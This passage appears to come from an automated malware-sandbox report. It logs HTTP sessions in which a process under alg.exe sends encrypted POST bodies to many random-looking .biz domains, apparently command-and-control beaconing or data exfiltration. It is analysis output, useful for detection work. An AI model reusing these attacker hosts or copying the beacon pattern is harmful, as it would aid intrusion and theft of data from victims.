                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.033890009 CET834OUTData Raw: 20 1b aa 2c 09 75 94 c1 36 03 00 00 47 09 60 9b f5 41 a2 31 41 14 02 18 61 ed 3b 61 30 c1 be 69 b2 39 03 f4 c8 99 07 8c a5 37 aa 9c 87 b0 0e 2a 89 7f 7c 31 a0 fe 45 fb fa ff ec 74 d2 b8 fc 51 fb 28 6a 2b 4e 9c 9c f4 44 92 a0 d5 08 85 4d 11 69 3a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,u6G`A1Aa;a0i97*|1EtQ(j+NDMi:}Re6|oW!*#1YhMPsb[(6y!)s&i|Y)'!D6~ TeM0Yl#t{@m@BbVQ`5hYNeu7;5fIx9/Tg
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.707056999 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=986430da78262c8560e41cbb3d0d8796|155.94.241.187|1731920359|1731920359|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        102192.168.2.105008118.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.581500053 CET350OUTPOST /fxciie HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.581500053 CET778OUTData Raw: ac 83 b6 e5 31 36 1c 75 fe 02 00 00 e6 5e 4d 40 b2 b8 3d ff 3d b1 76 73 a6 01 e3 d1 3d d9 dc 46 7c 89 2d 14 77 57 5b 60 c4 8f 67 3a c3 7e 70 eb 25 0f 8f 5b 83 05 75 8d 6b 56 36 4e 18 2f bd b2 e2 a6 6d 3c dd a1 9e 2b 99 12 42 3b 9d 87 6b b3 ef 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 16u^M@==vs=F|-wW[`g:~p%[ukV6N/m<+B;k7"8$hd?[},^#bE~+@{B&g*or.Xs@8(/;HkQlg(8_{5)wki_)cj#Q{N49UwAy
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.045259953 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=03701bfeec9d6198124e327c9cd8347f|155.94.241.187|1731920360|1731920360|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        103192.168.2.105008218.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.757873058 CET357OUTPOST /kwdmltggrfrmu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:19.757896900 CET834OUTData Raw: 4c 03 dd 3e 7c 0c 30 3a 36 03 00 00 c6 12 5e 62 75 52 77 5d 32 e2 ac 98 ff 5a 7a 10 6b 3a 87 31 ea 57 df c2 76 84 a3 76 20 b1 4c b2 ce d9 e8 39 69 a1 b5 b9 1d 39 c2 55 b4 fc 58 81 be f9 ca b6 63 46 c3 0c 21 31 e9 4c 14 41 e4 da 26 6b 57 0e cf 17
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: L>|0:6^buRw]2Zzk:1Wvv L9i9UXcF!1LA&kW"r/SLq%||ZeA[PE(rZz']\Dg_thZ<d{fn76*O;e,?l^5lc~np6L.!
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.229037046 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ef0a6d7a6bd508a3ae68f2aad61a4afe|155.94.241.187|1731920360|1731920360|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        104192.168.2.105008318.246.231.12080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.443382978 CET343OUTPOST /st HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.443402052 CET834OUTData Raw: 05 1b 79 ae 95 01 48 fd 36 03 00 00 ea 63 6f ff 15 57 ed 6d fb 4d 24 69 b8 b3 6a 0a 94 03 6b c4 9c 76 17 4a 13 ef 92 77 e6 e6 fc 0d 83 dc 84 58 24 18 e1 b0 fe 6e 90 99 4a bc cb 40 18 d6 c6 d9 d1 b7 d7 df 2f 5a 53 74 f2 4c 0c 4e e3 30 37 31 24 01
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: yH6coWmM$ijkvJwX$nJ@/ZStLN071$@a9XwQ/WoqIw3Pl"RE+Ra!(\am`7c,9KLu*gna/nag>p..mD!aFXB@#~;S!
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.316319942 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=e2f9469e285501c3bd44d633ca362252|155.94.241.187|1731920362|1731920362|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        105192.168.2.105008434.246.200.160807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.837865114 CET351OUTPOST /rfcbglebj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:21.837865114 CET778OUTData Raw: 76 c3 20 33 ac 9b 6e 02 fe 02 00 00 40 0a 3d c4 18 b2 89 db 91 ec fd fa 6a 53 62 c3 5e 28 93 24 fd 00 ec 38 26 08 85 06 73 47 66 5f 02 46 78 39 42 4e 63 a4 3a c3 0c 25 82 57 44 0f 06 f3 85 c0 13 df 58 ef 0c 33 be 68 24 51 e3 7b b2 45 ea 03 90 40
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: v 3n@=jSb^($8&sGf_Fx9BNc:%WDX3h$Q{E@7rDkJ4yxv}8;+%8n7|( Hb*'$1&Jt\Jt%`1tK'|tP<3Q>pY:.1#T.<i!=
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.814475060 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5878ad791dae4b3a8b54fd3b3f1a27f7|155.94.241.187|1731920362|1731920362|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        106192.168.2.105008518.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.507057905 CET347OUTPOST /ugn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:22.507111073 CET834OUTData Raw: 60 69 25 df 94 b7 b9 e4 36 03 00 00 05 9f 8f 52 34 53 27 04 37 2d 1e a1 c0 c3 27 9c 58 92 5c 13 6a 72 ce 31 bd c8 cb 73 a9 cb 8b 5c 34 52 41 d1 41 54 69 b6 d3 0e 88 4a ea 28 b7 9c 08 d8 b6 7b ad ad 0a 9f cd 80 f6 ae 82 9d b2 d2 23 c8 77 d4 45 73
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: `i%6R4S'7-'X\jr1s\4RAATiJ({#wEs%]d/I6DHfNT\44RhP>@#Kk4?&"MoH%"2T{dx?}j1KG/TDvmY^! -^%;.KBPOB~uvd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.170321941 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7db8344854959a83f326b8dfee12d846|155.94.241.187|1731920363|1731920363|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        107192.168.2.105008647.129.31.212807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.170159101 CET360OUTPOST /jcpwgygctjgsvho HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.170159101 CET778OUTData Raw: cd 7b 84 22 4a 35 fa 0d fe 02 00 00 67 39 99 62 6f bc e5 5b 93 64 14 8f de a9 e4 6c d9 a4 72 0d 29 ef d2 42 d7 48 f5 d3 3a 5f c6 93 ca 4d 6b 56 0a 35 9f 78 3d 4b 84 ec d4 fc 3e 22 89 a1 0b 43 6a 93 6b 0a 87 85 96 df 1a cf a0 0e e0 45 1d fa 27 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"J5g9bo[dlr)BH:_MkV5x=K>"CjkE'[u>[f4uxseOg*N}&adI#Vj; f{X8|gU5rC<!dpBAmKq<u-$Pb4=+kI6z<a`DI$|+.[oTRi]?-}NrZ


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        108192.168.2.105008713.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.192809105 CET346OUTPOST /wwge HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.192809105 CET834OUTData Raw: 58 8a d5 fd 5e e2 ce 52 36 03 00 00 6f 39 1c 22 30 da 3b 49 91 ab ba 2d 00 2f 2d d7 fd 78 a9 a6 b4 2e 00 30 b0 34 fe 3b 15 e9 67 58 6f 78 88 c9 10 ba b4 41 22 6c 89 84 80 d1 c2 a5 4a f2 33 1f e7 a0 ed 51 2b 52 36 4c b8 2b e6 26 69 a4 64 88 b0 5e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: X^R6o9"0;I-/-x.04;gXoxA"lJ3Q+R6L+&id^c8N:FII5'&,2R7KM/OwN')_Nr5mE7lVr"\[e-U6xK~:WQcq7\fZ'{u='a4=
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.636329889 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8f1e5e2a5b9d500419cb6d22eefa61cd|155.94.241.187|1731920364|1731920364|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        109192.168.2.105008847.129.31.212807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520540953 CET359OUTPOST /ohxhiftljchuvp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:23.520540953 CET778OUTData Raw: ad d8 96 0b 4f 90 d5 5c fe 02 00 00 4b 4b 25 22 a8 b7 49 cf 9c b4 34 b5 82 f7 93 2b 13 73 ab 62 c5 5b 3d b2 48 e2 2f 05 6b b4 6e be 73 fc 05 82 4a 83 07 e4 af 36 8d 5e fe 60 57 de 26 2a 7b 1f 7b 27 76 00 56 5b ca 51 13 47 60 ee 1f 1d 71 b8 62 b7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: O\KK%"I4+sb[=H/knsJ6^`W&*{{'vV[QG`qbce.M LH7n<x"N?qcO_{v\dylxL)V}uiDMwl,.88[m\`B!Y5O64-PM*vE<xAahW,B
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.980665922 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9490219c04560af5c787928e9676e5ec|155.94.241.187|1731920364|1731920364|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        110192.168.2.105008913.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659861088 CET347OUTPOST /fp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:24.659893990 CET834OUTData Raw: e1 25 f6 18 a2 25 65 bf 36 03 00 00 ba 15 cc 74 96 41 20 b8 80 84 92 22 f3 39 04 31 01 21 c7 52 a5 5a 28 cf 31 cb 11 36 be 7d 94 69 87 b3 d0 59 92 60 2e 16 c7 18 31 74 04 fe de 9b 1f 73 f7 5f 7c 6b 14 5a eb 3a 58 14 1a 8e 13 a4 80 d1 fd 25 00 ec
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %%e6tA "91!RZ(16}iY`.1ts_|kZ:X%=]:9,{ZA8UW36O6aUL0?^#zVJxP+yZ _t<<5E'_*1d36mj&$lF(/i#_eiLt4UV
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:26.102804899 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:25 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fc1b0a967f867a7bd8a9b78bbf63b461|155.94.241.187|1731920365|1731920365|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        111192.168.2.10500903.94.10.34807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:25.379667044 CET356OUTPOST /exuicwnpaqmh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
